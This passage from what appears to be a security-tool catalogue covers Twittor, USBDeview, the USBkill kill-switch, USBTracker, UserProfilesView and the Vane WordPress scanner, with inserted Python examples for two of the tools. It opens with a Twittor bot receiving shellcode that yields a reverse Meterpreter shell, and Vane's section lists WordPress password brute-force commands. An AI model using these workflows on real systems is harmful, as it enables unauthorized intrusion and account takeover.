    Extract the shellcode and send it to the specified bot using the !shellcode command:
    $ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
    [+] Sent shellcode with jobid: xdr7mtN
    $
    
    Et voilà!
    msf exploit(handler) > exploit
    
    [*] Started reverse handler on 10.0.0.1:3615 
    [*] Starting the payload handler...
    [*] Sending stage (884270 bytes) to 10.0.0.99
    [*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400
    
    meterpreter > getuid
    Server username: WIN-XXXXXXXXX\PaulSec
    
    Open a beer and enjoy your reverse meterpreter shell.


    Download Twittor

    USBDeview v2.45 - View all installed/connected USB devices on your system


    USBDeview is a small utility that lists all USB devices that are currently connected to your computer, as well as all USB devices that you previously used.

    For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more...

    USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, as well as to disable and enable USB devices.

    You can also use USBDeview on a remote computer, as long as you log in to that computer with an administrator account.

    Using USBDeview

    USBDeview doesn't require any installation process or additional DLL files. Just copy the executable file (USBDeview.exe) to any folder you like, and run it.

    The main window of USBDeview displays all USB devices installed on your system. You can select one or more items, and then disconnect (unplug) them, uninstall them, or just save the information into a text/xml/html file.

    USBDeview Columns Description
    • Device Name: Specifies the device name. For some devices, this column may display a meaningless name, like "USB Device". If the device name is meaningless, look at the Description column instead.
    • Device Description: The description of the device.
    • Device Type: The device type, according to USB class code. For more information about USB classes: USB Class Codes.
    • Connected: Specifies whether the device is currently connected to your computer. If the device is connected, you can use the 'Disconnect Selected Devices' option (F9) to disconnect the device.
    • Safe To Unplug: Specifies whether it's safe to unplug the device from the USB plug without disconnecting it first. If the value of this column is false, and you want to unplug this device, you must first disconnect this device by using the 'Disconnect Selected Devices' option (F9) of USBDeview utility, or by using the 'Unplug or Eject Hardware' utility of Windows operating system.
    • Drive Letter: Specifies the drive letter of the USB device. This column is only relevant to USB flash memory devices and to USB CD/DVD drives. Be aware that USBDeview cannot detect drive letters of USB hard-disks.
    • Serial Number: Specifies the serial number of the device. This column is only relevant to mass storage devices (flash memory devices, CD/DVD drives, and USB hard-disks).
    • Created Date: Specifies the date/time that the device was installed. In most cases, this date/time value represents the time that you first plugged the device into the USB port. However, be aware that in some circumstances this value may be wrong. Also, on Windows 7, this value is initialized with the current date/time on every reboot.
    • Last Plug/Unplug Date: Specifies the last time that you plugged/unplugged the device. This date value is lost when you restart the computer.
    • VendorID/ProductID: Specifies the VendorID and ProductID of the device. For an unofficial list of VendorID/ProductID values, click here.
    • USB Class/Subclass/Protocol: Specifies the Class/Subclass/Protocol of the device according to USB specifications. For more information about USB classes: USB Class Codes.
    • Hub/Port: Specifies the hub number and port number that the device was plugged into. This value is empty for mass storage devices.
    Notice: According to user reports, On some systems the 'Last Plug/Unplug Date' and the 'Created Date' values are initialized after reboot. This means that these columns may display the reboot time instead of the correct date/time.


    USBkill - Anti-Forensic Kill-Switch that waits for a change on your USB ports


    USBkill is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.

    To run:
    sudo python usbkill.py

    Why?

    Some reasons to use this tool:
    • In case the police or other thugs come busting in (or steal your laptop from you when you are at a public library, as happened to Ross). The police commonly use a "mouse jiggler" to keep the screensaver and sleep mode from activating.
    • You don't want someone to retrieve documents (such as private keys) from your computer or install malware/backdoors via USB.
    • You want to improve the security of your (full disk encrypted) home or corporate server (e.g. your Raspberry Pi).
    [!] Important: Make sure to use (at least partial) disk encryption! Otherwise they will get in anyway.
    Tip: Additionally, you may use a cord to attach a USB key to your wrist. Then insert the key into your computer and start usbkill. If they take your computer, the USB key is pulled out and the computer shuts down immediately.

    Feature List

    (version 1.0-rc.2)
    • Compatible with Linux, *BSD and OS X.
    • Shut down the computer when there is USB activity.
    • Customizable. Define which commands should be executed just before shut down.
    • Ability to whitelist a USB device.
    • Ability to change the check interval (default: 250ms).
    • Ability to melt the program on shut down.
    • Works with sleep mode (OS X).
    • No dependency except srm. sudo apt-get install secure-delete
    • Sensible defaults

    Supported command line arguments (mainly for devs):
    • --no-shut-down: Execute all the (destructive) commands you defined in settings.ini, but don’t turn off the computer.
    • --cs: Copy program folder settings.ini to /etc/usbkill/settings.ini
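    An added example, not usbkill's own code, of the mechanism the feature list describes: poll the USB bus, compare against a baseline, ignore whitelisted vid:pid values, run user-defined commands, and power off unless a dry-run flag (the counterpart of --no-shut-down) is set. The lsusb snapshots are constructed for a hypothetical machine, the poweroff command is assumed to be Linux's, and the polling interval defaults to the 250 ms the tool uses.

```python
import re
import subprocess
import time

LSUSB_RE = re.compile(r'^Bus (\d{3}) Device (\d{3}): ID ([0-9a-fA-F]{4}):([0-9a-fA-F]{4})(?:\s+(.*))?$')

# Constructed `lsusb` snapshots (hypothetical machine): between the two, the
# stick on device 003 disappears and an unknown device 004 appears.
SAMPLE_BEFORE = """\
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 003: ID 0951:1666 Kingston Technology DataTraveler 100 G3
"""
SAMPLE_AFTER = """\
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 004: ID 04e8:6860 Samsung Electronics Co., Ltd Galaxy series
"""


def parse_lsusb(text):
    """Map (bus, device) -> 'vid:pid' for every line of `lsusb` output."""
    devices = {}
    for line in text.splitlines():
        m = LSUSB_RE.match(line.strip())
        if m:
            bus, dev, vid, pid, _desc = m.groups()
            devices[(bus, dev)] = f'{vid}:{pid}'.lower()
    return devices


def detect_change(baseline, current, whitelist=frozenset()):
    """Events (bus, dev, vid:pid, 'added'|'removed') since the baseline, skipping
    whitelisted vid:pid values. A re-plugged device gets a new device number,
    so it shows up as one 'removed' plus one 'added'. Whitelisting by vid:pid
    is only as strong as those identifiers: a device that spoofs a whitelisted
    vid:pid is not noticed."""
    events = []
    for key in current.keys() - baseline.keys():
        if current[key] not in whitelist:
            events.append((key[0], key[1], current[key], 'added'))
    for key in baseline.keys() - current.keys():
        if baseline[key] not in whitelist:
            events.append((key[0], key[1], baseline[key], 'removed'))
    return sorted(events)


def snapshot():
    """Live snapshot via lsusb (needs usbutils; run as root for the shutdown step)."""
    out = subprocess.run(['lsusb'], capture_output=True, text=True, check=True).stdout
    return parse_lsusb(out)


def watch(interval=0.25, whitelist=frozenset(), dry_run=True, poll=snapshot,
          pre_shutdown=()):
    """Poll until a non-whitelisted change occurs, run the caller's pre-shutdown
    commands, then power off unless dry_run (the analogue of --no-shut-down).
    Returns the triggering events. `poll` is injectable so the loop can be
    exercised with canned snapshots."""
    baseline = poll()
    while True:
        time.sleep(interval)
        events = detect_change(baseline, poll(), whitelist)
        if not events:
            continue
        for cmd in pre_shutdown:            # e.g. ['srm', '-r', '/home/me/keys']
            subprocess.run(cmd, check=False)
        if not dry_run:
            subprocess.run(['sync'], check=False)
            subprocess.run(['poweroff', '-f'], check=False)   # assumed Linux; BSD/OS X differ
        return events


if __name__ == '__main__':
    snaps = iter([parse_lsusb(SAMPLE_BEFORE), parse_lsusb(SAMPLE_AFTER)])
    for ev in watch(interval=0, poll=lambda: next(snaps), dry_run=True):
        print(*ev)
```

    Run for real with watch(dry_run=False, whitelist=frozenset({'0951:1666'})) as root; keep the whitelist to the one key on your wrist cord, since every whitelisted vid:pid is a device an attacker may present without triggering the kill-switch.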

    Download USBkill

    USBTracker - Script to track USB devices events and artifacts in a Windows OS


    USBTracker is a quick & dirty coded incident response and forensics Python script to dump USB related information and artifacts from a Windows OS (vista and later).

    Special recommendations
    USBTracker reads some protected log files and needs to be run with administrator permissions. The simplest way to run USBTracker is to launch a CMD or PowerShell console with a right click "run as administrator", then execute the script / exe inside it.

    Executable version
    If you don't have a Python distribution installed on the computer you want to analyze with USBTracker, you can also download an .exe version of the script, "compiled" with PyInstaller, from the repository.

    Dependencies
    USBTracker is developed with Python 2.7 and has not been tested with other Python versions. It uses the great Python module python-evtx by Willi Ballenthin, so please don't forget to install it before using USBTracker.

    Usage

    Help
    To display the help, just use the "-h" flag:
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -h
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some
    log files artifacts.
    
    usage: usbtracker.py [-h] [-u | -uu] [-nh] [-df] [-x]
    
    optional arguments:
      -h, --help            show this help message and exit
      -u, --usbstor         Dump USB artifacts from USBSTOR registry
      -uu, --usbstor-verbose
                            Dump USB detailed artifacts from USBSTOR registry.
      -nh, --no-hardwareid  Hide HardwareID value during a USBSTOR detailed
                            artifacts registry dump.
      -df, --driver-frameworks
                            Dump USB artifacts and events from the Windows
                            DriverFrameworks Usermode log.
      -x, --raw-xml-event   Display event results in raw xml (with -df option
                            only).
    

    List known USB storage devices
    If you want to list all USB storage devices known by Windows, use the "-u" flag to get a simple list :
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -u
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some
    log files artifacts.
    
    USB device(s) known by this computer :
    =====================================
    
    CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GP08NU20&Rev_1.00
    Disk&Ven_Generic&Prod_STORAGE_DEVICE&Rev_0272
    Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_1.00
    Disk&Ven_WD&Prod_5000AAV_External&Rev_1.65
    Disk&Ven_WD&Prod_Elements_10B8&Rev_1012
    Disk&Ven_WD&Prod_My_Book_1140&Rev_1012
    Other&Ven_WD&Prod_SES_Device&Rev_1012
    
    or the "-uu" flag if you want to get a detailed list :
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -uu
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some
    log files artifacts.
    
    USB device(s) known by this computer :
    =====================================
    
    CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GP08NU20&Rev_1.00
    
            Serial : 00101016400086C55&0
    
            DeviceDesc : @cdrom.inf,%gencdrom_devdesc%;CD-ROM Drive
            Capabilities : 16
            HardwareID : [u'USBSTOR\\CdRomHL-DT-STDVDRAM_GP08NU20_1.00', u'USBSTOR\\CdRomHL-DT-STDVDRAM_GP08NU20_', u'USBSTO
    R\\CdRomHL-DT-ST', u'USBSTOR\\HL-DT-STDVDRAM_GP08NU20_1', u'HL-DT-STDVDRAM_GP08NU20_1', u'USBSTOR\\GenCdRom', u'GenCdRom
    ']
            CompatibleIDs : [u'USBSTOR\\CdRom', u'USBSTOR\\RAW']
            ContainerID : {def10b43-2e59-5e9f-8ca6-ffab1cfc9afa}
            Service : cdrom
            ClassGUID : {4d36e965-e325-11ce-bfc1-08002be10318}
            ConfigFlags : 0
            Driver : {4d36e965-e325-11ce-bfc1-08002be10318}\0001
            Class : CDROM
            Mfg : @cdrom.inf,%genmanufacturer%;(Standard CD-ROM drives)
            FriendlyName : HL-DT-ST DVDRAM GP08NU20 USB Device
    
    ======================================================================
    
    Disk&Ven_Generic&Prod_STORAGE_DEVICE&Rev_0272
    
            Serial : 000000000272&0
    
            DeviceDesc : @disk.inf,%disk_devdesc%;Disk drive
            Capabilities : 16
            HardwareID : [u'USBSTOR\\DiskGeneric_STORAGE_DEVICE__0272', u'USBSTOR\\DiskGeneric_STORAGE_DEVICE__', u'USBSTOR\
    \DiskGeneric_', u'USBSTOR\\Generic_STORAGE_DEVICE__0', u'Generic_STORAGE_DEVICE__0', u'USBSTOR\\GenDisk', u'GenDisk']
            CompatibleIDs : [u'USBSTOR\\Disk', u'USBSTOR\\RAW']
            ContainerID : {a3ce89cb-5363-54a8-8d4f-af2374c200a5}
            ConfigFlags : 0
            ClassGUID : {4d36e967-e325-11ce-bfc1-08002be10318}
            Driver : {4d36e967-e325-11ce-bfc1-08002be10318}\0004
            Class : DiskDrive
            Mfg : @disk.inf,%genmanufacturer%;(Standard disk drives)
            Service : disk
            FriendlyName : Generic STORAGE DEVICE USB Device
    
    ======================================================================
    
    ...
    
    

    Dumping events and artifacts from Microsoft-Windows-DriverFrameworks-UserMode%4Operational.evtx log file :
    To dump all USB related events (currently EventID 2003, 2004, 2005, 2010, 2100, 2102 & 2105) from the Microsoft-Windows-DriverFrameworks-UserMode%4Operational.evtx log file, use the "-df" flag.
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -df
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some
    log files artifacts.
    
    USB related event(s) found in the event log :
    =============================================
    
    UTC Time : 2015-01-18 20:31:34.138399
    EventID : 2003 | Description : UMDFHostDeviceArrivalBegin | Computer : 37L4247F27-25 | User SID : S-1-5-19 | User : LocalService
    Lifetime : 8c076f4d-6405-4414-a829-ee44a94e3893
    WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#
    
    UTC Time : 2015-01-18 20:31:34.138399
    EventID : 2010 | Description : UMDFHostDeviceArrivalEnd | Computer : 37L4247F27-25 | User SID : S-1-5-19 | User : LocalService
    Lifetime : 8c076f4d-6405-4414-a829-ee44a94e3893
    WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#
    
    UTC Time : 2015-01-18 20:31:34.138399
    EventID : 2004 | Description : UMDFHostAddDeviceBegin | Computer : 37L4247F27-25 | User SID : S-1-5-19 | User : LocalService
    Lifetime : 8c076f4d-6405-4414-a829-ee44a94e3893
    WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#
    
    ...
    
    To dump the same events in XML format, just add the "-x" flag :
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -df -x
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some
    log files artifacts.
    
    USB related event(s) found in the event log :
    =============================================
    
    <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-DriverFra
    meworks-UserMode" Guid="2e35aaeb-857f-4beb-a418-2e6c0e54d988"></Provider>
    <EventID Qualifiers="">1003</EventID>
    <Version>1</Version>
    <Level>4</Level>
    <Task>17</Task>
    <Opcode>1</Opcode>
    <Keywords>0x8000000000000000</Keywords>
    <TimeCreated SystemTime="2015-01-18 20:31:34.013599"></TimeCreated>
    <EventRecordID>2</EventRecordID>
    <Correlation ActivityID="" RelatedActivityID=""></Correlation>
    <Execution ProcessID="836" ThreadID="1488"></Execution>
    <Channel>Microsoft-Windows-DriverFrameworks-UserMode/Operational</Channel>
    <Computer>37L4247F27-25</Computer>
    <Security UserID="S-1-5-18"></Security>
    </System>
    <UserData><UMDFDriverManagerHostCreateStart lifetime="8c076f4d-6405-4414-a829-ee44a94e3893" xmlns:auto-ns2="http://schem
    as.microsoft.com/win/2004/08/events" xmlns="http://www.microsoft.com/DriverFrameworks/UserMode/Event"><HostGuid>{193a182
    0-d9ac-4997-8c55-be817523f6aa}</HostGuid>
    <DeviceInstanceId>WPDBUSENUMROOT.UMB.2&amp;37C186B&amp;0&amp;STORAGE#VOLUME#_??_USBSTOR#DISK&amp;VEN_KINGSTON&amp;PROD_D
    ATATRAVELER_2.0&amp;REV_1.00#0019B931D970C8C0C5DB00B9&amp;0#</DeviceInstanceId>
    </UMDFDriverManagerHostCreateStart>
    </UserData>
    </Event>
    
    ...
    

    Dumping events and artifacts from setupapi.dev.log log file :
    To dump all USB device installation events (generally the first use of a device) from the setupapi.dev.log log file, use the "-sa" flag (note that this flag is not listed in the "-h" output shown above):
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -sa
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some log files artifacts.
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\vid_0930&pid_6544\0019b931d970c8c0c5db00b9]
    >>>  Section start 2015/01/18 21:31:02.314
    
    >>>  [Setup online Device Install (Hardware initiated) - storage\volume\_??_usbstor#disk&ven_kingston&prod_datatraveler_2.0&rev_1.00#0019b931d970c8c0c5db00b9&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}]
    >>>  Section start 2015/01/18 21:31:28.241
    
    >>>  [Setup online Device Install (Hardware initiated) - WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#]
    >>>  Section start 2015/01/18 21:31:30.956
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\root_hub20\4&56dcbd&0]
    >>>  Section start 2015/01/18 21:31:59.457
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\root_hub\4&38d808bf&0]
    >>>  Section start 2015/01/18 21:32:28.925
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\root_hub\4&fee3d1d&0]
    >>>  Section start 2015/01/18 21:32:31.593
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\root_hub20\4&3a831ac0&0]
    >>>  Section start 2015/01/18 21:32:32.825
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\vid_0458&pid_0137\5&1d8fb94c&0&3]
    >>>  Section start 2015/01/18 21:32:36.866
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\vid_05ac&pid_8242\5&1d8fb94c&0&5]
    >>>  Section start 2015/01/18 21:32:47.037
    
    >>>  [Setup online Device Install (Hardware initiated) - usb\vid_05ac&pid_8502\8t9a9e8d577k3l00]
    >>>  Section start 2015/01/18 21:32:48.160
    
    ...
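    Added example, not part of USBTracker: a parser for the two artifact sources the tool dumps above. It pairs each setupapi.dev.log "Device Install" header with its "Section start" timestamp to give a first-install timeline, splits USB and USBSTOR instance paths into VID/PID, vendor, product, revision and serial, flags instance IDs that Windows generated because the device reported no serial, and parses USBSTOR key names as printed by -u. The sample text is copied from the setupapi output shown above; the "second character is &" rule for generated IDs is Windows' instance-ID convention, not something the page states.

```python
import re
from datetime import datetime

# Sample copied from the setupapi.dev.log output shown above (four of its sections).
SAMPLE_SETUPAPI = r"""
>>>  [Setup online Device Install (Hardware initiated) - usb\vid_0930&pid_6544\0019b931d970c8c0c5db00b9]
>>>  Section start 2015/01/18 21:31:02.314

>>>  [Setup online Device Install (Hardware initiated) - storage\volume\_??_usbstor#disk&ven_kingston&prod_datatraveler_2.0&rev_1.00#0019b931d970c8c0c5db00b9&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}]
>>>  Section start 2015/01/18 21:31:28.241

>>>  [Setup online Device Install (Hardware initiated) - usb\root_hub20\4&56dcbd&0]
>>>  Section start 2015/01/18 21:31:59.457

>>>  [Setup online Device Install (Hardware initiated) - usb\vid_0458&pid_0137\5&1d8fb94c&0&3]
>>>  Section start 2015/01/18 21:32:36.866
"""

SECTION_RE = re.compile(r'^>>>\s+\[Setup online Device Install \(Hardware initiated\) - (?P<dev>.+)\]\s*$')
START_RE = re.compile(r'^>>>\s+Section start (?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\s*$')
# usb\vid_XXXX&pid_XXXX\<instance>
USB_RE = re.compile(r'^usb\\vid_(?P<vid>[0-9a-f]{4})&pid_(?P<pid>[0-9a-f]{4})\\(?P<inst>[^\\]+)$', re.I)
# ...usbstor#<type>&ven_<v>&prod_<p>&rev_<r>#<instance>#...
USBSTOR_RE = re.compile(r'usbstor#(?P<type>[^&#]+)&ven_(?P<ven>[^&]*)&prod_(?P<prod>[^&]*)&rev_(?P<rev>[^#]*)#(?P<inst>[^#]+)#', re.I)
# USBSTOR registry key name as printed by `usbtracker.py -u`
KEY_RE = re.compile(r'^(?P<type>[^&]+)&Ven_(?P<ven>[^&]*)&Prod_(?P<prod>[^&]*)&Rev_(?P<rev>.*)$')


def has_unique_serial(instance_id):
    """Windows puts '&' as the second character of an instance ID it had to
    generate itself, i.e. the device reported no serial number. Such IDs are
    not stable across machines or ports and must not be treated as a device
    identity in a timeline."""
    return len(instance_id) > 1 and instance_id[1] != '&'


def classify(device_id):
    """Split a setupapi device instance path into structured fields."""
    m = USB_RE.match(device_id)
    if m:
        inst = m.group('inst')
        unique = has_unique_serial(inst)
        return {'kind': 'usb', 'vid': m.group('vid').lower(), 'pid': m.group('pid').lower(),
                'serial': inst if unique else None, 'unique_serial': unique}
    m = USBSTOR_RE.search(device_id)
    if m:
        # the trailing '&N' is the LUN index Windows appends, not part of the serial
        serial = m.group('inst').rsplit('&', 1)[0]
        unique = has_unique_serial(serial)
        return {'kind': 'usbstor', 'type': m.group('type').lower(), 'vendor': m.group('ven').lower(),
                'product': m.group('prod').lower(), 'rev': m.group('rev'),
                'serial': serial if unique else None, 'unique_serial': unique}
    return {'kind': 'other'}


def parse_setupapi(text):
    """Pair each 'Device Install' header with its 'Section start' timestamp.
    setupapi.dev.log timestamps are local time; the -df event log output
    above is UTC, which is why the page's two samples differ by one hour."""
    records, pending = [], None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            pending = m.group('dev')
            continue
        m = START_RE.match(line)
        if m and pending is not None:
            rec = {'device_id': pending,
                   'start': datetime.strptime(m.group('ts'), '%Y/%m/%d %H:%M:%S.%f')}
            rec.update(classify(pending))
            records.append(rec)
            pending = None
    return records


def usb_timeline(text):
    """USB-related installs only, oldest first: the first-seen time of each device."""
    return sorted((r for r in parse_setupapi(text) if r['kind'] in ('usb', 'usbstor')),
                  key=lambda r: r['start'])


def parse_usbstor_key(name):
    """Parse a USBSTOR key such as 'Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_1.00'."""
    m = KEY_RE.match(name)
    if not m:
        raise ValueError(f'not a USBSTOR key name: {name!r}')
    return {'type': m.group('type'), 'vendor': m.group('ven'),
            'product': m.group('prod'), 'rev': m.group('rev')}


if __name__ == '__main__':
    for r in usb_timeline(SAMPLE_SETUPAPI):
        print(r['start'], r['kind'], r.get('vid') or r.get('vendor'),
              r.get('pid') or r.get('product'), 'serial=%s' % r['serial'])
```

    On a live system feed it the contents of C:\Windows\INF\setupapi.dev.log; the serial field is the value to correlate with the USBSTOR key instance names from -uu and with the DriverFrameworks-UserMode events from -df, and entries with unique_serial False should be correlated by VID/PID and time only.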
    


    Download USBTracker

    UserProfilesView - View User Profiles Information On Your Windows


    UserProfilesView displays the list of all user profiles that you currently have in your system. For each user profile, the following information is displayed: Domain\User Name, Profile Path, Last Load Time, Registry File Size, User SID, and more. You can save the profiles list into text/xml/html/csv file.

    Versions History
    • Version 1.10
      • Added 'Run As Administrator' option (Ctrl+F11)
      • Added 'Registry Loaded' column (Yes/No), which specifies whether the Registry key of the user is loaded into HKEY_USERS key.
      • Added 'Logon Time' column, which specifies the logon time of the current logged on user.
      • UserProfilesView now displays the system users that it failed to get in previous versions.
    • Version 1.01 - Added command-line options for sorting.
    • Version 1.00 - First release.

    System Requirements

    This utility works with any version of Windows, starting from Windows 2000, and up to Windows 10.

    Using UserProfilesView

    UserProfilesView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - UserProfilesView.exe
    After running it, the main window displays the list of all user profiles. You can select one or more items, and then save the list into a text/xml/html/csv file.

    Command-Line Options


    /stext <Filename> Save the list of all profiles into a regular text file.
    /stab <Filename> Save the list of all profiles into a tab-delimited text file.
    /scomma <Filename> Save the list of all profiles into a comma-delimited text file.
    /stabular <Filename> Save the list of all profiles into a tabular text file.
    /shtml <Filename> Save the list of all profiles into HTML file (Horizontal).
    /sverhtml <Filename> Save the list of all profiles into HTML file (Vertical).
    /sxml <Filename> Save the list of all profiles to XML file.
    /sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Profile Path" and "User Name". You can specify the '~' prefix character (e.g: "~Last Load Time") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
    UserProfilesView.exe /shtml "f:\temp\profiles.html" /sort 2 /sort ~1
    UserProfilesView.exe /shtml "f:\temp\profiles.html" /sort "User Name"
    /nosort When you specify this command-line option, the list will be saved without any sorting.      


    Download UserProfilesView

    Vane - WordPress Vulnerability Scanner (A GPL fork of WPScan)


    Vane is a GPL fork of WPScan, the popular WordPress vulnerability scanner that is no longer free software.

    INSTALL

    Prerequisites
    • Windows not supported
    • Ruby >= 1.9
    • RubyGems
    • Git

    Installing on Debian/Ubuntu
    sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev
    git clone https://github.com/delvelabs/vane.git
    cd vane
    sudo gem install bundler && bundle install --without test development
    

    Installing on Fedora
    sudo yum install libcurl-devel
    git clone https://github.com/delvelabs/vane.git
    cd vane
    sudo gem install bundler && bundle install --without test development
    


    Installing on Archlinux
    pacman -Sy ruby
    pacman -Sy libyaml
    
    git clone https://github.com/delvelabs/vane.git
    cd vane
    sudo gem install bundler && bundle install --without test development
    
    gem install typhoeus
    gem install nokogiri
    

    Installing on Mac OS X
    git clone https://github.com/delvelabs/vane.git
    cd vane
    sudo gem install bundler && bundle install --without test development
    


    KNOWN ISSUES

    Typhoeus segmentation fault
    Update cURL to version >= 7.21 (you may have to install from source). See http://code.google.com/p/vane/issues/detail?id=81


    Proxy not working
    Update cURL to version >= 7.21.7 (you may have to install from source).
    Installation from source:
    • Grab the sources from http://curl.haxx.se/download.html
    • Decompress the archive
    • Open the folder with the extracted files
    • Run ./configure
    • Run make
    • Run sudo make install
    • Run sudo ldconfig


    cannot load such file -- readline
    Run sudo aptitude install libreadline5-dev libncurses5-dev
    Then, open the directory of the readline gem (you have to locate it)
    cd ~/.rvm/src/ruby-1.9.2-p180/ext/readline
    ruby extconf.rb
    make
    make install
    
    See http://vvv.tobiassjosten.net/ruby-on-rails/fixing-readline-for-the-ruby-on-rails-console/ for more details


    VANE ARGUMENTS
    --update Update to the latest revision
    --url | -u The WordPress URL/domain to scan.
    --force | -f Forces WPScan to not check if the remote site is running WordPress.
    --enumerate | -e [option(s)] Enumeration. Options:
      u        usernames from id 1 to 10
      u[10-20] usernames from id 10 to 20 (you must write the [] chars)
      p        plugins
      vp       only vulnerable plugins
      ap       all plugins (can take a long time)
      tt       timthumbs
      t        themes
      vt       only vulnerable themes
      at       all themes (can take a long time)
    Multiple values are allowed: '-e tt,p' will enumerate timthumbs and plugins. If no option is supplied, the default is 'vt,tt,u,vp'
    --exclude-content-based '' Used with the enumeration option; excludes all occurrences matching the regexp or string supplied. You do not need to provide the regexp delimiters, but you must write the quotes (single or double)
    --config-file | -c Use the specified config file
    --follow-redirection If the target url has a redirection, it will be followed without asking for confirmation
    --wp-content-dir WPScan tries to find the content directory (i.e. wp-content) by scanning the index page; however, you can specify it. Subdirectories are allowed
    --wp-plugins-dir Same as --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
    --proxy <[protocol://]host:port> Supply a proxy (will override the one from conf/browser.conf.json). HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used
    --proxy-auth username:password Supply the proxy login credentials (will override the one from conf/browser.conf.json).
    --basic-auth username:password Set the HTTP Basic authentication
    --wordlist | -w Supply a wordlist for the password bruter and do the brute.
    --threads | -t The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
    --username | -U Only brute force the supplied username.
    --help | -h This help screen.
    --verbose | -v Verbose output.

    VANE EXAMPLES
    Do 'non-intrusive' checks...
    ruby vane.rb --url www.example.com
    
    Do wordlist password brute force on enumerated users using 50 threads...
    ruby vane.rb --url www.example.com --wordlist darkc0de.lst --threads 50
    
    Do wordlist password brute force on the 'admin' username only...
    ruby vane.rb --url www.example.com --wordlist darkc0de.lst --username admin
    
    Enumerate installed plugins...
    ruby vane.rb --url www.example.com --enumerate p
    

    VANETOOLS ARGUMENTS
    --help    | -h   This help screen.
    --Verbose | -v   Verbose output.
    --update  | -u   Update to the latest revision.
    --generate_plugin_list [number of pages]  Generate a new data/plugins.txt file. (supply number of *pages* to parse, default : 150)
    --gpl  Alias for --generate_plugin_list
    --check-local-vulnerable-files | --clvf <local directory>  Perform a recursive scan in the <local directory> to find vulnerable files or shells
    

    VANETOOLS EXAMPLES
    Generate a new 'most popular' plugin list, up to 150 pages ...
    ruby vanetools.rb --generate_plugin_list 150
    
    Locally scan a WordPress installation for vulnerable files or shells :
